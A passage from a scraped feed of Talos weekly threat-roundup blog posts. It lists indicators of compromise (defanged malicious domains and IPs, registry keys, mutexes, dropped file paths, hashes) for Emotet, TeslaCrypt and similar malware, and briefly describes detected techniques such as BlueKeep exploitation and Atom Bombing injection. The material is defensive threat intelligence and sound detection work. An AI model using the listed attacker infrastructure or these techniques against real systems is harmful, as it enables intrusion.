\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`maxcdn[.]bootstrapcdn[.]com` | 1 \n`get[.]adobe[.]com` | 4 \n`en[.]wikipedia[.]org` | 14 \n`www[.]torproject[.]org` | 7 \n`www[.]collectionscanada[.]ca` | 7 \n`alpha3[.]suffolk[.]lib[.]ny[.]us` | 7 \n`www[.]archives[.]gov` | 7 \n`www[.]vitalrec[.]com` | 7 \n`www[.]cdc[.]gov` | 7 \n`hldsfuh[.]info` | 1 \n`mmteenijjjuyoqju[.]info` | 1 \n`ydgsjrjqotlffitfg[.]org` | 1 \n`dxpmkdipp[.]info` | 1 \n`cojkhmdxrwvxwxa[.]pw` | 1 \n`qgilcuym[.]org` | 1 \n`www[.]multicounter[.]de` | 9 \n`pqhwfeeivtkxi[.]click` | 5 \n`othcijmuhwb[.]pl` | 4 \n`iconhrdqmeueg[.]su` | 2 \n`cdwguymjxnyot[.]pl` | 3 \n`veiqvqirdhmyis[.]org` | 4 \n`qoaouhgwfy[.]biz` | 2 \n`hkwyfnevdievebgjx[.]xyz` | 2 \n`ligumssfsrtfpy[.]xyz` | 4 \n`rqtcmltkurtev[.]pw` | 2 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%HOMEPATH%\\Contacts\\Administrator.contact` | 15 \n`%TEMP%\\d19ab989\\4710.tmp` | 8 \n`%TEMP%\\d19ab989\\a35f.tmp` | 8 \n`\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\_14-INSTRUCTION.html` | 7 \n`\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\_15-INSTRUCTION.html` | 7 \n`\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\_16-INSTRUCTION.html` | 7 \n`\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\_17-INSTRUCTION.html` | 7 \n`\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\_18-INSTRUCTION.html` | 7 \n`\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\_19-INSTRUCTION.html` | 7 \n`\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\_20-INSTRUCTION.html` | 7 \n`%ProgramData%\\Adobe\\Updater6\\_21-INSTRUCTION.html` | 7 \n`%ProgramData%\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\_22-INSTRUCTION.html` | 7 \n`%ProgramData%\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\_24-INSTRUCTION.html` | 7 \n`%ProgramData%\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\_26-INSTRUCTION.html` | 7 \n`%ProgramData%\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\_25-INSTRUCTION.html` | 7 \n`%ProgramData%\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\_28-INSTRUCTION.html` | 7 \n`%ProgramData%\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\_27-INSTRUCTION.html` | 7 \n`%ProgramData%\\Microsoft\\IlsCache\\_29-INSTRUCTION.html` | 7 \n`%ProgramData%\\Microsoft\\Network\\Downloader\\_46-INSTRUCTION.html` | 7 \n`%ProgramData%\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\_45-INSTRUCTION.html` | 7 \n`%ProgramData%\\Microsoft\\OfficeSoftwareProtectionPlatform\\_48-INSTRUCTION.html` | 7 \n`%ProgramData%\\Microsoft\\RAC\\PublishedData\\_44-INSTRUCTION.html` | 7 \n`%ProgramData%\\Microsoft\\RAC\\StateData\\_41-INSTRUCTION.html` | 7 \n`%ProgramData%\\Microsoft\\User Account Pictures\\Default Pictures\\_33-INSTRUCTION.html` | 7 \n`%ProgramData%\\Microsoft\\User Account Pictures\\_34-INSTRUCTION.html` | 7 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 0670326e0572ca61e6a1f9b654088f5ac91fd3426dcba932377c801763fe5906 085198d732095e24f5165d61636930cb1012b833278d86565a66d23dd0ffce96 14f9231bd987060133bc1e2908a9a5691e829d6f2cc43010f943e4070b0102cf 2f5776b368011a76db2c690252846d0e3a90ccd27d9575e015663cebaf58db23 5815f647ad348de649c3ebfb5f1987e305410855cc944d14b1284abaaa40d9e3 593ead1c717d2ca3ed32fa98da70f4df7e0a99431d0327fc08c363621afc1fbe a515545e6056e1a9f75a4f7d0afefb54bf7e1ffb1e5f7f6641cece38db7e6cf0 bebd3b1683b69a383af7689f70ad3e3992630e0fc07d98e2e014f4978136722a c11b9d1ba0badcc063eb6e60894b7f4f0932e4f73d037f05e06c80d72833b328 c4cfc1a33b5e956376c773674c1a8baa318832f2d75fac9efe53fbc895ace7da cb73396e304937a404c63ad696c6e2d269f38d8082d636e2c16e550f1f7cb118 cd8b407e19e2d93dfc939cd04e3a43100d2442128f42c226ac1dedeba0da4824 d2377ff809d7d65898523f10b38331edf20c11547776894343e926f6bddf1e39 d6e35e20d5b7fa3d0b5352b4953701cabb4ed2a83d94dc666ef9900b7c53394a d851e224dd46fbf74960d57bf29f8b60157e9b697e5132d5e97abe504f6038a2 d9ddfa571587bd55c75526b8f17e6dbbb8a4b6179bfc002575cdcbf446154e7a fd1e8a916fa218df73894c59784dc94cbd26c7c7a5e1c1ee37ce45b349e4cc2c `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-ZnBq2sVehBU/XkbmO3anDII/AAAAAAAADT0/wj80al3dA3Ajcuw_6SUUQGjAbQBgazCKwCLcBGAsYHQ/s1600/d851e224dd46fbf74960d57bf29f8b60157e9b697e5132d5e97abe504f6038a2_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-Dcj1XBW55ao/XkbmSCbeXFI/AAAAAAAADT8/pnsmYG6HaCEaZmf3NOYrkEwtxv19k74ngCLcBGAsYHQ/s1600/d851e224dd46fbf74960d57bf29f8b60157e9b697e5132d5e97abe504f6038a2_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-ex3DbvgX5Ow/XkbmWdet0wI/AAAAAAAADUA/_sFoL3ZJzrMq-GDxOkYCpFiKfjXbT52XgCLcBGAsYHQ/s1600/d2377ff809d7d65898523f10b38331edf20c11547776894343e926f6bddf1e39_umbrella.png>)\n\n \n\n\n#### Malware\n\n[](<https://1.bp.blogspot.com/-jLsjhr0_epY/Xkbmb2rgrAI/AAAAAAAADUE/klXR0xSE4z0KByVybr4Jm2WbNY_XVV7RQCLcBGAsYHQ/s1600/0670326e0572ca61e6a1f9b654088f5ac91fd3426dcba932377c801763fe5906_malware.png>)\n\n \n\n\n \n\n\n* * *\n\n## Exploit Prevention\n\nCisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities. \nCVE-2019-0708 detected \\- (4662) \n--- \nAn attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP) request. Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction. \nExcessively long PowerShell command detected \\- (749) \nA PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats. \nKovter injection detected \\- (319) \nA process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns. \nProcess hollowing detected \\- (206) \nProcess hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead. \nGamarue malware detected \\- (188) \nGamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system. \nAtom Bombing code injection technique detected \\- (133) \nA process created a suspicious Atom, which is indicative of a known process injection technique called Atom Bombing. Atoms are Windows identifiers that associate a string with a 16-bit integer. These Atoms are accessible across processes when placed in the global Atom table. Malware exploits this by placing shell code as a global Atom, then accessing it through an Asynchronous Process Call (APC). A target process runs the APC function, which loads and runs the shellcode. The malware family Dridex is known to use Atom Bombing, but other threats may leverage it as well. \nInstallcore adware detected \\- (105) \nInstall core is an installer which bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of popups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware. \nDealply adware detected \\- (75) \nDealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware. \nReverse http payload detected \\- (30) \nAn exploit payload intended to connect back to an attacker controlled host using http has been detected. \nCorebot malware detected \\- (20) \nCorebot is a Trojan with many capabilities found in other prominent families. It features a plugin system to enable it to load a variety of features from the C&amp;C server at any time. Known plugins include RAT capabilities such as taking desktop screenshots, as well as being able to intercept and modify browser communications and steal data, especially data related to banking. \n \n", "modified": "2020-02-14T11:35:23", "published": "2020-02-14T11:35:23", "id": "TALOSBLOG:E339E76DD9CC8BF6BC7108066B44196A", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/3m6HBreCgdU/threat-roundup-0207-0214.html", "type": "talosblog", "title": "Threat Roundup for February 7 to February 14", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T21:28:03", "bulletinFamily": "blog", "cvelist": ["CVE-2019-0708"], "description": "[](<https://1.bp.blogspot.com/-YY2FQl9WGXA/XURYSq-inGI/AAAAAAAAACc/Ko8Q3jzMHrs2tIOdnt-yO6QVWhNtZBrPwCLcBGAs/s1600/recurring%2Bblog%2Bimages_threat%2Broundup.jpg>)\n\nToday, Talos is publishing a glimpse into the most prevalent threats we've observed between Jan. 24 and Jan. 31. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats. \n \nAs a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net. \n \n \nFor each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found [here](<https://alln-extcloud-storage.cisco.com/blogs/1/2020/01/tru.json_.txt>)that includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicate maliciousness. \nThe most prevalent threats highlighted in this roundup are: \n \nThreat Name | Type | Description \n---|---|--- \nDoc.Downloader.Emotet-7561073-0 | Downloader | Emotet is one of the most widely distributed and active malware families today. It is a highly modular threat that can deliver a wide variety of payloads. Emotet is commonly delivered via Microsoft Office documents with macros, sent as attachments on malicious emails. \nWin.Ransomware.TeslaCrypt-7561199-1 | Ransomware | TeslaCrypt is a well-known ransomware family that encrypts a user's files with strong encryption and demands Bitcoin in exchange for a file decryption service. A flaw in the encryption algorithm was discovered that allowed files to be decrypted without paying the ransomware, and eventually, the malware developers released the master key allowing all encrypted files to be recovered easily. \nWin.Malware.Cerber-7561026-0 | Malware | Cerber is ransomware that encrypts documents, photos, databases and other important files. Historically, this malware would replace files with encrypted versions and add the file extension \".cerber,\" although in more recent campaigns other file extensions are used. \nWin.Packed.njRAT-7561028-1 | Packed | njRAT, also known as Bladabindi, is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes and remotely turn on the victim's webcam and microphone. njRAT was developed by the Sparclyheason group. Some of the largest attacks using this malware date back to 2014. \nWin.Packed.Kuluoz-7561668-1 | Packed | Kuluoz, sometimes known as \"Asprox,\" is a modular remote access trojan that is also known to download and execute follow-on malware, such as fake antivirus software. Kuluoz is often delivered via spam emails pretending to be shipment delivery notifications or flight booking confirmations. \nWin.Trojan.SmokeLoader-7562031-1 | Trojan | SmokeLoader is malware primarily used to download and execute additional malware. Read more about this threat on our blog at https://blog.talosintelligence.com/2018/07/smoking-guns-smoke-loader-learned-new.html. \nWin.Malware.Nymaim-7565328-1 | Malware | Nymaim is malware that can be used to deliver ransomware and other malicious payloads. It uses a domain generation algorithm to generate potential command and control (C2) domains to connect to additional payloads. \nWin.Packed.ZBot-7563206-1 | Packed | Zbot, also known as Zeus, is a trojan that steals information, such as banking credentials, using methods like key-logging and form-grabbing. \nPUA.Win.File.Dealply-7563212-0 | File | DealPly is an adware program that installs an add-on for web browsers and displays malicious ads. \n \n* * *\n\n## Threat Breakdown\n\n### Doc.Downloader.Emotet-7561073-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MEXICOGUID ` | 5 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MEXICOGUID \nValue Name: Type ` | 5 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MEXICOGUID \nValue Name: Start ` | 5 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MEXICOGUID \nValue Name: ErrorControl ` | 5 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MEXICOGUID \nValue Name: ImagePath ` | 5 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MEXICOGUID \nValue Name: DisplayName ` | 5 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MEXICOGUID \nValue Name: WOW64 ` | 5 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MEXICOGUID \nValue Name: ObjectName ` | 5 \nMutexes | Occurrences \n---|--- \n`Global\\I98B68E3C` | 5 \n`Global\\M98B68E3C` | 5 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`100[.]98[.]237[.]179` | 15 \n`100[.]100[.]159[.]93` | 15 \n`100[.]67[.]234[.]62` | 15 \n`100[.]121[.]59[.]233` | 15 \n`100[.]105[.]91[.]145` | 15 \n`186[.]138[.]186[.]74` | 5 \n`35[.]203[.]98[.]50` | 5 \n`35[.]214[.]151[.]75` | 5 \n`173[.]194[.]205[.]108/31` | 3 \n`51[.]77[.]113[.]100` | 3 \n`190[.]24[.]243[.]186` | 3 \n`176[.]9[.]47[.]53` | 2 \n`193[.]70[.]18[.]144` | 2 \n`17[.]36[.]205[.]74` | 2 \n`74[.]202[.]142[.]71` | 2 \n`86[.]96[.]229[.]29` | 2 \n`74[.]202[.]142[.]33` | 2 \n`200[.]44[.]32[.]43` | 2 \n`74[.]202[.]142[.]51` | 2 \n`172[.]217[.]6[.]211` | 2 \n`196[.]43[.]2[.]142` | 2 \n`123[.]58[.]177[.]239` | 2 \n`74[.]202[.]142[.]25` | 2 \n`94[.]23[.]252[.]181` | 2 \n`185[.]224[.]136[.]6` | 2 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`cliniquefranceville[.]net` | 20 \n`institutpediatriesociale[.]com` | 20 \n`cool-game[.]info` | 15 \n`abakonferans[.]org` | 15 \n`cnarr-tchad[.]org` | 15 \n`imail[.]dahnaylogix[.]com` | 2 \n`smtp[.]prodigy[.]net[.]mx` | 2 \n`smtp[.]amilcargo[.]com` | 2 \n`smtp[.]infinitummail[.]com` | 2 \n`mail[.]cantv[.]net` | 2 \n`smtp[.]alestraune[.]net[.]mx` | 2 \n`smtp[.]saix[.]net` | 2 \n`smtp[.]dsl[.]telkomsa[.]net` | 2 \n`gwsmtp[.]lgdisplay[.]com` | 2 \n`smtp[.]pangia[.]biz` | 2 \n`mail[.]suntakpcb[.]com` | 2 \n`smtp[.]grupobiblioteca[.]es` | 2 \n`mail[.]1und1[.]de` | 1 \n`smtp[.]mail[.]pjud` | 1 \n`mail[.]ofsnt[.]com` | 1 \n`smtp[.]svacv[.]es` | 1 \n`smtp[.]roteisa[.]es` | 1 \n`mail[.]ebrou[.]az` | 1 \n`mail[.]assets[.]cl` | 1 \n`hotelancor[.]com` | 1 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%HOMEPATH%\\976.exe` | 20 \n`%TEMP%\\<random, matching '[a-z]{3}[A-F0-9]{3,4}'>.tmp` | 17 \n`%TEMP%\\tst7C.tmp` | 1 \n`%TEMP%\\tstBC.tmp` | 1 \n`%TEMP%\\tstE.tmp` | 1 \n \n#### File Hashes\n\n` 020514ef776f7380cafd8d2999591c75e0d476fc139450d9ac6fdfe09dd7ae87 0b77b17216fc7fb3b5de978762f07a063f722709597d0444aa2625123b8925a8 25efcc40c30bdfc1415f61c5fa2da3a569c7f4a511933bb0b898292367ca6804 2ef37c6a7f53e69a4e81613d72c21e1bc4413d4c3ebfbdb59f4c5a43b7233ae2 339e0f2df55ba72558ab93082fbb5ef218fe8527611c2c1961a4506d7c6521c4 44713e481564f2ce7a930e43bcdda80390718b92301f85cb575098959de0f6e1 44b91893a8d2d4df847664829c426f8fa0f1f3b565b0614bcf958e18795bf144 44bcf15f4888850c235f6e5e7b88bb357a3be71e4b8b22cf9cbaa7ecadbce81c 52c9a08e9df80b7b3ee5dcba625f097da1ad214cad2fb488dd4ff5296f598a4d 544b49bce1aeac4879cdcd5526cab45257ada596d9a32b3cbd254b7cb5bab381 6591f298762dac4578f9a738d736e65002adb412139af02c8cdf129ea1eb96ad 6cfb6058d1b0f8aa7927a40680c7fcd88e0c3f67cdfc2b271af7823dd89754a3 70084c2ceb78bd84337fbbfdb4765d5cfcf58a003b9d39b07c4e1ca9e7e1291d 7d6b5fa35c763390dc6187b13dae9d0248b6adacdd1b3ecd57dabd29e6aeca22 b072a08b5c35f8fb107b90ee815584ac4f7b24bd6ae30a803717f1f3fdfbeaea ca7b1a3d7db2feeb5548928ff6adb85fdb993b11795f88fed56ec7649beef850 d4b2aaebb6b4c3413610303cd78a4c7a3c57d6d269e775421881f48d7e37b898 d97abe68b3f17ac6ed03f44542568c5fc3f1586ff71a618202a6d045ed296ccf f44dadeff2a79d2ce69d0e7f8c63b7fac1bd972306dc7f803440a6378b9af58c fa60f451bb2be89d13963f75bcfc165868a5fa32d9752debbf2f077916884ac5 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-B8gXyuA4_38/XjR_Mq3WdGI/AAAAAAAADMY/FenvfmcH_hwTpkzTnszF9oTbnLfeNNb8ACLcBGAsYHQ/s1600/25efcc40c30bdfc1415f61c5fa2da3a569c7f4a511933bb0b898292367ca6804_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-kG2S95O66eQ/XjR_Qjdx-RI/AAAAAAAADMc/QkbkLDeGilouHUe2UwCh9zZIhKisqfESwCLcBGAsYHQ/s1600/25efcc40c30bdfc1415f61c5fa2da3a569c7f4a511933bb0b898292367ca6804_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-Eg62KOZTbZc/XjR_VGsmjUI/AAAAAAAADMg/TAr9Xw7BMYwN5z1cd6Czq8r2OxPY5uNCwCLcBGAsYHQ/s1600/020514ef776f7380cafd8d2999591c75e0d476fc139450d9ac6fdfe09dd7ae87_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Ransomware.TeslaCrypt-7561199-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM \nValue Name: EnableLinkedConnections ` | 21 \n`<HKCU>\\SOFTWARE\\XXXSYS ` | 21 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\ACTION CENTER\\CHECKS\\{C8E6F269-B90A-4053-A3BE-499AFCEC98C4}.CHECK.0 \nValue Name: CheckSetting ` | 21 \n`<HKCU>\\SOFTWARE\\XXXSYS \nValue Name: ID ` | 21 \n`<HKCU>\\Software\\<random, matching '[A-Z0-9]{14,16}'> ` | 21 \n`<HKCU>\\Software\\<random, matching '[A-Z0-9]{14,16}'> \nValue Name: data ` | 21 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 \nValue Name: Blob ` | 20 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: clycoowjblev ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: xcdjaxwnjnyv ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: kdkrjkoxcoox ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: jylmwtguxgkt ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: ookfknruoagc ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: kjayrvnavhux ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: xlfrocgqtuck ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: rjopbftidbxn ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: untudrlkcqaf ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: exoxvooruudo ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: itbqxmjmhgli ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: ngtpiwrksqfm ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: ajcdjvtakwtb ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: nhflhnkqeiix ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: sllccxaietxc ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: tauqjbughujc ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: pdfnqsbitrak ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: awjcujlsmtrl ` | 1 \nMutexes | Occurrences \n---|--- \n`ityeofm9234-23423` | 21 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`204[.]11[.]56[.]48` | 21 \n`109[.]73[.]238[.]245` | 21 \n`85[.]128[.]188[.]138` | 21 \n`162[.]241[.]224[.]203` | 21 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`en[.]wikipedia[.]org` | 21 \n`www[.]torproject[.]org` | 21 \n`tt54rfdjhb34rfbnknaerg[.]milerteddy[.]com` | 21 \n`gwe32fdr74bhfsyujb34gfszfv[.]zatcurr[.]com` | 21 \n`tes543berda73i48fsdfsd[.]keratadze[.]at` | 21 \n`music[.]mbsaeger[.]com` | 21 \n`surrogacyandadoption[.]com` | 21 \n`imagescroll[.]com` | 21 \n`worldisonefamily[.]info` | 21 \n`biocarbon[.]com[.]ec` | 21 \n`stacon[.]eu` | 21 \nFiles and or directories created | Occurrences \n---|--- \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$I0ZU5JT.txt` | 21 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$I478AKJ.txt` | 21 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$I4FI238.txt` | 21 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$I4FKVBH.txt` | 21 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$I4QK3KJ.txt` | 21 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$I5QX7W9.txt` | 21 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$I77RW1L.txt` | 21 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$I7J37KF.txt` | 21 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$I9NSD58.txt` | 21 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$IANXEE8.txt` | 21 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$IC5NB1M.txt` | 21 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$ID60W3E.txt` | 21 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$IIUTK07.txt` | 21 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$IJE160U.txt` | 21 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$IKAVPAE.txt` | 21 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$IL2NS3P.txt` | 21 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$INKC8CM.txt` | 21 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$IP8M1EE.txt` | 21 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$IPDP9E0.txt` | 21 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$ISIYA4I.txt` | 21 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$IV54ALI.txt` | 21 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$IWK2JPN.txt` | 21 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$IWYYKMD.txt` | 21 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$IXC3P46.txt` | 21 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$IZ7KADN.txt` | 21 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 0bdadbb588f8cfc714bec1feb439cd5e06ebbfe33a1cb5676faad4d85304dd0b 11a166c4e1ecbe40cfc39cc03c57aafe2f812f2187a0a0d1e27c03ac932c869c 23d00f9302a58aa9903bafc850ed358fab58eb2ef82b8aa07515c22a558d23b7 335db66a2abb1f82bd92f5b6cd74722b9d5cf209beac6dcb2eefde17603d6a99 42b4d5ce541c8784936ece2082690368223730d112f108aa8d810192c54455d9 50e2f2c53166d6cb2466aa679a2917c71c6f65eb3348d350d2e38b3aeb738ddd 6d3e58844146e35ef586f8ec5b1d470a95cf360578e1d9c8aa9e012a736dd8f3 7edeacf55c94647b6826b71e08517702712d11ac41e7e5f14957812d1c9492a5 921ebcefaff3b70bf0cdd963a1442b172ac92872d4fcf757594a5998c49404cc 9482d8782e4cdefabd0d2e14645924fa508b4d49173861360db2d3d8099b713d 9d9d7709dcb74cbb2715375e4eea839263b1dd497bb27a3c8a6ada0c10aca1b3 9f7a453c5814a6ad35b0c227e97b8a1635e9b75d779c4955ff484645857f54bb b1c341cf5a3a405102e80a476986dc624e580b2d314fb80b93e967713790268a b3e5577ffd2705637a709a961aa9add3822eacd9d492b081385b1a5ac21dd34d c2d69d1b4e4977cbc97108ca5818e6fcfed517f3480b441726d6f75ac7962d84 ca6f903670b80305f33bb4b2431a8fa5c75fd59ac3938f06cf2826a98224be57 d2bcb8683986f9f06f38569c4402804cee939f56a90b40078b819e324400eb53 